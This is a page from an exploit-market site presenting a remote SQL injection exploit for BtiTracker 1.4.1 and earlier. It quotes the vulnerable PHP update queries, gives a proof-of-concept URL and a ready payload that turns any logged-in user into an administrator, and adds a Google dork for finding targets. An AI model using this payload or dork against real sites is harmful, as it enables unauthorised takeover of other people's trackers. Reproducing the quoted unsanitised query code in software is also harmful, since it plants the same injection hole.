[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BtiTracker <= 1.4.1 (become admin) Remote SQL Injection Vulnerability

Author
m@ge|ozz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1900
Category
web applications
Date add
21-05-2007
Platform
unsorted
=====================================================================
BtiTracker <= 1.4.1 (become admin) Remote SQL Injection Vulnerability
=====================================================================


#################################################################################
#										
#	BtiTracker <=v1.4.1 Remote SQL Injection Exploit	              
#													
# Vulnerabitity: Remote Sql Injection /	                                        
# Problem: Any user can be Administrator										
# 										
# Vulnerable Code (account_change.php):						
#										
# if (isset($_GET["style"]))       						
# @mysql_query("UPDATE users SET style=$style WHERE id=".$CURUSER["uid"]);      
# 										
# if (isset($_GET["langue"])) 							
# @mysql_query("UPDATE users SET language=$langue WHERE id=".$CURUSER["uid"]);		
#										
# PoC: account_change.php?style=2[SQL]&returnto=%2F				
#      										
# Example to gain admin control: account_change.php?style=1,id_level=8								
#										
# 										
# GoogleDork: "by Btiteam"							
#										
# Shoutz: - eVolVe or Die - 							
#										
#################################################################################



#  0day.today [2024-12-25]  #